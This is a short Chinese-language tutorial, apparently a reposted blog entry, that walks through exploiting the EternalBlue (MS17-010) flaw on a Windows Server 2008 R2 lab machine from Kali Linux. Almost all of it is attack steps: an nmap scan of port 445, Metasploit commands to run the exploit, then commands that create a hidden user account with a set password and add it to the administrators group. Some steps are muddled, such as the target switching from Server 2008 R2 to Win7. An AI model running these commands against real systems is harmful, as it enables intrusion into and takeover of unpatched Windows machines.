永恒之藍惡意代碼會掃描開放445檔案共享埠的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟體、遠程控制木馬、虛擬貨幣挖礦機等惡意程式,
攻擊機:kali linux
靶機:Windows sever2008 r2
kali和靶機要在同一個網段
我們打開kali
nmap -Pn(目標ip) 掃描目標埠開啟情況,主要目標445

msfconsole 打開攻擊軟體

search ms17-010 查看漏洞利用模塊

use 0(一共四個模塊,第一個是掃描模塊) 打開掃描模塊
show options 打開目標設定界面,設定RHOSTS目標IP地址

set rhosts (目標ip) 設定目標IP地址 也是windows server2008 r2的ip

run 運行漏洞

net user king9 2000666zli. /add [在目標主機上創建一個名為king9的賬戶,密碼 2000666zli.

目標主機被創建賬戶
因為是創建的用戶 所有沒有管理員權限,我們給他進行提權
kali下對win7提權
net localgroup administrators 賬戶名/add
然后我們登陸windows server2008r2

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/376952.html
標籤:其他
